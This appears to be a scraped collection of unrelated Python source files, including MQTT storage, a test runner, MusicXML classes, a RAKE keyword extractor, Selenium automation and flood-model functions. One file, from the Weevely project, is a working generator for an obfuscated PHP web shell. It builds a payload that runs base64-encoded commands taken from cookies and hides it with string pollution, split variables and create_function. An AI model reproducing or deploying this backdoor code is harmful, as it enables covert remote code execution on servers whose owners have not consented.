Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
"""
celery_app = app_or_default()
shutdown_worker(celery_app)
celery_app = Celery("ichnaea.taskapp.app")
configure_celery(celery_app)
| 2.390625 | 2 |
gmqtt/storage.py | sabuhish/gmqtt | 0 | 10842 | import asyncio
from typing import Tuple
import heapq
class BasePersistentStorage(object):
async def push_message(self, mid, raw_package):
raise NotImplementedError
def push_message_nowait(self, mid, raw_package) -> asyncio.Future:
try:
asyncio.get_event_loop()
except RuntimeError as err:
if "There is no current event loop in thread" in str(err):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return asyncio.ensure_future(self.push_message(mid, raw_package))
async def pop_message(self) -> Tuple[int, bytes]:
raise NotImplementedError
async def remove_message_by_mid(self, mid):
raise NotImplementedError
@property
async def is_empty(self) -> bool:
raise NotImplementedError
class HeapPersistentStorage(BasePersistentStorage):
def __init__(self, timeout):
self._queue = []
self._timeout = timeout
async def push_message(self, mid, raw_package):
tm = asyncio.get_event_loop().time()
heapq.heappush(self._queue, (tm, mid, raw_package))
async def pop_message(self):
current_time = asyncio.get_event_loop().time()
(tm, mid, raw_package) = heapq.heappop(self._queue)
if current_time - tm > self._timeout:
return mid, raw_package
else:
heapq.heappush(self._queue, (tm, mid, raw_package))
return None
async def remove_message_by_mid(self, mid):
message = next(filter(lambda x: x[1] == mid, self._queue), None)
if message:
self._queue.remove(message)
heapq.heapify(self._queue)
@property
async def is_empty(self):
return not bool(self._queue)
| 2.625 | 3 |
test/testframework/runner.py | 5GExchange/escape | 10 | 10843 | # Copyright 2017 <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
Main runner class which capable of running the test script and kill the
process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
self.__killed = False
self.__killed = False
pass
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and it's parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
| 2.28125 | 2 |
Calliope/13 Clock/Clock.py | frankyhub/Python | 0 | 10844 | from microbit import *
hands = Image.ALL_CLOCKS
#A centre dot of brightness 2.
ticker_image = Image("2\n").crop(-2,-2,5,5)
#Adjust these to taste
MINUTE_BRIGHT = 0.1111
HOUR_BRIGHT = 0.55555
#Generate hands for 5 minute intervals
def fiveticks():
fivemins = 0
hours = 0
while True:
yield hands[fivemins]*MINUTE_BRIGHT + hands[hours]*HOUR_BRIGHT
fivemins = (fivemins+1)%12
hours = (hours + (fivemins == 0))%12
#Generate hands with ticker superimposed for 1 minute intervals.
def ticks():
on = True
for face in fiveticks():
for i in range(5):
if on:
yield face + ticker_image
else:
yield face - ticker_image
on = not on
#Run a clock speeded up 60 times, so we can watch the animation.
for tick in ticks():
display.show(tick)
sleep(200) | 3.265625 | 3 |
home/kakadu31/sabertooth.py | rv8flyboy/pyrobotlab | 63 | 10845 | #Variables
#Working with build 2234
saberPort = "/dev/ttyUSB0"
#Initializing Motorcontroller
saber = Runtime.start("saber", "Sabertooth")
saber.connect(saberPort)
sleep(1)
#Initializing Joystick
joystick = Runtime.start("joystick","Joystick")
print(joystick.getControllers())
python.subscribe("joystick","publishJoystickInput")
joystick.setController(0)
for x in range(0,100):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
for x in range(100,-1,-1):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
| 2.578125 | 3 |
Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 0 | 10846 | <filename>Dangerous/Weevely/core/backdoor.py<gh_stars>0
# -*- coding: utf-8 -*-
# This file is part of Weevely NG.
#
# Copyright(c) 2011-2012 Weevely Developers
# http://code.google.com/p/weevely/
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
| 2.109375 | 2 |
musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | 2 | 10847 | <filename>musicscore/musicxml/types/complextypes/notations.py
from musicscore.dtd.dtd import Sequence, GroupReference, Choice, Element
from musicscore.musicxml.attributes.optional_unique_id import OptionalUniqueId
from musicscore.musicxml.attributes.printobject import PrintObject
from musicscore.musicxml.groups.common import Editorial
from musicscore.musicxml.elements.xml_element import XMLElement
from musicscore.musicxml.types.complextypes.arpeggiate import ComplexTypeArpeggiate
from musicscore.musicxml.types.complextypes.articulations import ComplexTypeArticulations
from musicscore.musicxml.types.complextypes.complextype import ComplexType
from musicscore.musicxml.types.complextypes.dynamics import Dynamics
from musicscore.musicxml.types.complextypes.fermata import ComplexTypeFermata
from musicscore.musicxml.types.complextypes.ornaments import ComplexTypeOrnaments
from musicscore.musicxml.types.complextypes.slide import ComplexTypeSlide
from musicscore.musicxml.types.complextypes.slur import ComplexTypeSlur
from musicscore.musicxml.types.complextypes.technical import ComplexTypeTechnical
from musicscore.musicxml.types.complextypes.tied import ComplexTypeTied
from musicscore.musicxml.types.complextypes.tuplet import ComplexTypeTuplet
class Tied(ComplexTypeTied):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Slur(ComplexTypeSlur):
_TAG = 'slur'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Tuplet(ComplexTypeTuplet):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Glissando(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='glissando', value=value, *args, **kwargs)
raise NotImplementedError()
class Slide(ComplexTypeSlide):
""""""
_TAG = 'slide'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Ornaments(ComplexTypeOrnaments):
""""""
_TAG = 'ornaments'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Technical(ComplexTypeTechnical):
""""""
_TAG = 'technical'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Articulations(ComplexTypeArticulations):
""""""
_TAG = 'articulations'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Fermata(ComplexTypeFermata):
""""""
_TAG = 'fermata'
def __init__(self, value='normal', *args, **kwargs):
super().__init__(tag=self._TAG, value=value, *args, **kwargs)
class Arpeggiate(ComplexTypeArpeggiate):
""""""
_TAG = 'arpeggiate'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class NonArpeggiate(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='non-arpeggiate', value=value, *args, **kwargs)
raise NotImplementedError()
class AccidentalMark(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='accidental-mark', value=value, *args, **kwargs)
raise NotImplementedError()
class OtherNotation(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='other-notation', value=value, *args, **kwargs)
raise NotImplementedError()
class ComplexTypeNotations(ComplexType, PrintObject, OptionalUniqueId):
"""
Notations refer to musical notations, not XML notations. Multiple notations are allowed in order to represent
multiple editorial levels. The print-object attribute, added in Version 3.0, allows notations to represent details
of performance technique, such as fingerings, without having them appear in the score.
"""
_DTD = Sequence(
GroupReference(Editorial),
Choice(
Element(Tied),
Element(Slur),
Element(Tuplet),
Element(Glissando),
Element(Slide),
Element(Ornaments),
Element(Technical),
Element(Articulations),
Element(Dynamics),
Element(Fermata),
Element(Arpeggiate),
Element(NonArpeggiate),
Element(AccidentalMark),
Element(OtherNotation),
min_occurrence=0,
max_occurrence=None
)
)
def __init__(self, *args, **kwargs):
super().__init__(tag='notations', *args, **kwargs)
| 2.0625 | 2 |
src/constants.py | MitraSeifari/pystackoverflow | 0 | 10848 | <gh_stars>0
from types import SimpleNamespace
from src.utils.keyboard import create_keyboard
keys = SimpleNamespace(
settings=':gear: Settings',
cancel=':cross_mark: Cancel',
back=':arrow_left: Back',
next=':arrow_right: Next',
add=':heavy_plus_sign: Add',
edit=':pencil: Edit',
save=':check_mark_button: Save',
delete=':wastebasket: Delete',
yes=':white_check_mark: Yes',
no=':negetive_squared_cross_mark: No',
ask_question=':red_question_mark: Ask a question',
send_question=':envelope_with_arrow: Send question',
)
keyboards = SimpleNamespace(
main=create_keyboard(keys.ask_question, keys.settings),
ask_question=create_keyboard(keys.cancel, keys.send_question),
)
states = SimpleNamespace(
main='MAIN',
ask_question='ASK_QUESTION'
)
| 2.65625 | 3 |
iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 0 | 10849 | <reponame>gAldeia/iirsBenchmark
# Author: <NAME>
# Contact: <EMAIL>
# Version: 1.0.0
# Last modified: 08-20-2021 by <NAME>
"""
Simple exception that is raised by explainers when they don't support local
or global explanations, or when they are not model agnostic. This should be
catched and handled in the experiments.
"""
class NotApplicableException(Exception):
def __init__(self, message=""):
self.message = message | 2.09375 | 2 |
covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 0 | 10850 | import click
from covid_data_tracker.registry import PluginRegistry
def plugin_selector(selected_country: str):
"""plugin selector uses COUNTRY_MAP to find the appropriate plugin
for a given country.
Parameters
----------
selected_country : str
specify the country of interest.
Returns
-------
covid_data_tracker.plugins.BasePlugin
More appropriately, returns an instance of a country-specific
subclass of BasePlugin.
"""
if selected_country in PluginRegistry.keys():
klass = PluginRegistry[selected_country]
instance = klass()
else:
raise AttributeError
click.echo('No country plugin available')
return instance
def country_downloader(country: str):
"""Finds country plugin, fetches data, and downloads
to csv with click alerts.
Parameters
----------
country : str
Name of country
Returns
-------
NoneType
"""
click.echo(f"selecting plugin for {country}")
country_plugin = plugin_selector(country)
click.echo(f"attempting to find available data for {country}")
country_plugin.fetch()
click.echo(f"downloading available data for {country}")
country_plugin.check_instance_attributes()
country_plugin.download()
| 3.125 | 3 |
dev/libs.py | karimwitani/webscraping | 0 | 10851 | <filename>dev/libs.py
import selenium
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def browser_init():
option = webdriver.ChromeOptions()
browser = webdriver.Chrome(executable_path='/Library/Application Support/Google/chromedriver', chrome_options=option)
return browser
def insta_login(browser):
browser.get('https://www.instagram.com')
#Find username/pass fields
username = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="username"]')))
password = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="password"]')))
#input username and pass
username.clear()
username.send_keys('itanikarim')
password.clear()
password.send_keys('<PASSWORD>')
#Login
Login_button = WebDriverWait(browser, 2).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="loginForm"]/div/div[3]'))).click()
#Skip buttons
not_now = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
not_now2 = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
print("everything ok") | 2.90625 | 3 |
setup.py | dwastberg/osmuf | 0 | 10852 | from setuptools import setup
setup(name='osmuf',
version='0.1',
install_requires=[
"seaborn",
],
description='Urban Form analysis from OpenStreetMap',
url='http://github.com/atelierlibre/osmuf',
author='AtelierLibre',
author_email='<EMAIL>',
license='MIT',
packages=['osmuf'],
zip_safe=False)
| 1.070313 | 1 |
tests/test_model.py | artemudovyk/django-updown | 41 | 10853 | <filename>tests/test_model.py
# -*- coding: utf-8 -*-
"""
tests.test_model
~~~~~~~~~~~~~~~~
Tests the models provided by the updown rating app
:copyright: 2016, weluse (https://weluse.de)
:author: 2016, <NAME> <<EMAIL>>
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import random
from django.test import TestCase
from django.contrib.auth.models import User
from updown.models import SCORE_TYPES
from updown.exceptions import CannotChangeVote
from tests.models import RatingTestModel
class TestRatingModel(TestCase):
"""Test case for the generic rating app"""
def setUp(self):
self.instance = RatingTestModel.objects.create()
self.user = User.objects.create(
username=str(random.randint(0, 100000000))
)
self.user2 = User.objects.create(
username=str(random.randint(0, 100000000))
)
def test_basic_vote(self):
"""Test a simple vote"""
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 1)
def test_change_vote(self):
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.instance.rating.add(SCORE_TYPES['DISLIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 0)
self.assertEquals(self.instance.rating_dislikes, 1)
def test_change_vote_disallowed(self):
self.instance.rating2.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertRaises(CannotChangeVote, self.instance.rating2.add,
SCORE_TYPES['DISLIKE'], self.user, '192.168.0.1')
| 2.578125 | 3 |
nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | 0 | 10854 | <reponame>GarryGaller/nlp_toolkit
import sys,os
from typing import List
from collections import defaultdict, Counter
from itertools import groupby, chain, product
import heapq
from pprint import pprint
import string
class Rake():
def __init__(
self,
text:List[List[str]],
stopwords=[],
max_words=100,
min_chars=3
):
self.text = text
self.stopwords = stopwords
self.blacklist = set(chain(stopwords, string.punctuation))
self._phrases = set()
# Частота (freq(w)) определяется как количество фраз,
# в которые входит рассматриваемое слово
self.freq = Counter()
# Степень (deg(w)) определяется как суммарное количество слов,
# из которых состоят фразы, в которых оно содержится.
self.degree = Counter()
# Вес слова определим как отношение степени слова к его частоте:
# s(w) = deg(w)/freq(w)
self.token_weights = Counter()
self.phrase_scores = Counter()
self.min_chars = min_chars
self.max_words = max_words
self._generate_phrases()
self._calc_frequencies()
self._calc_weights()
self._calc_scores()
def _generate_phrases(self):
'''Create contender phrases from sentences.'''
for sent in self.text:
self._phrases.update(self._get_phrase_list(sent))
def _get_phrase_list(self,sent):
'''Grouping the left words into phrases'''
groups = groupby(sent, lambda x: x not in self.blacklist)
phrases = [tuple(group[1]) for group in groups if group[0]]
result = []
for phrase in phrases:
if (
phrase
and len(' '.join(phrase)) >= self.min_chars
and len(phrase) <= self.max_words
):
result.append(phrase)
#print('_get_phrase_list')
#pprint(result)
return result
def _calc_frequencies(self):
'''Calculation of frequencies of words'''
for phrase in self._phrases:
for token in phrase:
self.freq[token] += 1
self.degree[token] += len(phrase) - 1 # 1 вычитается не везде; смысл?
# не во всех примерах Rake используется добавление частоты к degree ; смысл?
for token in self.freq:
self.degree[token] += self.freq[token]
def _calc_frequencies2(self):
self.freq = Counter(chain.from_iterable(self._phrases))
def build_occurance_graph():
graph = defaultdict(lambda: defaultdict(int))
for phrase in self._phrases:
# For each phrase in the phrase list, count co-occurances of the
# word with other words in the phrase.
#
# Note: Keep the co-occurances graph as is, to help facilitate its
# use in other creative ways if required later.
for (word, coword) in product(phrase, phrase):
graph[word][coword] += 1
return graph
graph = build_occurance_graph()
self.degree = defaultdict(int)
for token in graph:
self.degree[token] = sum(graph[token].values())
pprint(graph )
def _calc_weights(self):
# веса слов s(w) = deg(w)/freq(w)
for token in self.freq:
score = self.degree[token] / (self.freq[token] * 1.0)
self.token_weights[token] += score
def _calc_scores(self):
for phrase in self._phrases:
#print(phrase,self._phrases.count(phrase))
score = sum(self.token_weights.get(token,0) for token in phrase)
self.phrase_scores[' '.join(phrase)] += score
def topn(self,n=7,phrase=True):
'''Get top phrases with ratings'''
if phrase:
scores = self.phrase_scores
else:
scores = self.token_weights
if n < 0:
n = len(scores)
return heapq.nlargest(n,
scores,
key=scores.get
)
def phrases(self,scores=True):
if scores:
result = sorted(
self.phrase_scores.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.phrase_scores,
key=self.phrase_scores.get,
reverse=True
)
return result
def get_token_weights(self,scores=True):
if scores:
result = sorted(
self.token_weights.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.token_weights,
key=self.token_weights.get,
reverse=True
)
return result
| 2.65625 | 3 |
depimpact/tests/test_functions.py | NazBen/dep-impact | 0 | 10855 | <gh_stars>0
import numpy as np
import openturns as ot
def func_overflow(X, model=1, h_power=0.6):
"""Overflow model function.
Parameters
----------
X : np.ndarray, shape : N x 8
Input variables
- x1 : Flow,
- x2 : Krisler Coefficient,
- x3 : Zv, etc...
model : bool, optional(default=1)
If 1, the classical model. If 2, the economic model.
Returns
-------
Overflow S (if model=1) or Cost Cp (if model=2).
"""
X = np.asarray(X)
if X.shape[0] == X.size: # It's a vector
n = 1
dim = X.size
ids = None
else:
n, dim = X.shape
ids = range(n)
assert dim == 8, "Incorect dimension : dim = %d != 8" % dim
Q = X[ids, 0]
Ks = X[ids, 1]
Zv = X[ids, 2]
Zm = X[ids, 3]
Hd = X[ids, 4]
Cb = X[ids, 5]
L = X[ids, 6]
B = X[ids, 7]
H = (Q / (B * Ks * np.sqrt((Zm - Zv) / L)))**h_power
S = Zv + H - Hd - Cb
if model == 1:
return S
elif model == 2:
Cp = (S > 0.) + (0.2 + 0.8 * (1. - np.exp(-1000. / (S**4)))) * (S <= 0.) + 1./20. * (Hd * (Hd > 8.) + 8*(Hd <= 8.))
return Cp
else:
raise AttributeError('Unknow model.')
tmp = ot.Gumbel()
tmp.setParameter(ot.GumbelMuSigma()([1013., 558.]))
dist_Q = ot.TruncatedDistribution(tmp, 500., 3000.)
dist_Ks = ot.TruncatedNormal(30., 8., 15., np.inf)
dist_Zv = ot.Triangular(49., 50., 51.)
dist_Zm = ot.Triangular(54., 55., 56.)
dist_Hd = ot.Uniform(7., 9.)
dist_Cb = ot.Triangular(55., 55.5, 56.)
dist_L = ot.Triangular(4990., 5000., 5010.)
dist_B = ot.Triangular(295., 300., 305.)
margins_overflow = [dist_Q, dist_Ks, dist_Zv, dist_Zm, dist_Hd, dist_Cb, dist_L, dist_B]
var_names_overflow = ["Q", "K_s", "Z_v", "Z_m", "H_d", "C_b", "L", "B"]
def func_sum(x, a=None):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.dot(x, a)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_prod(x, a=None):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
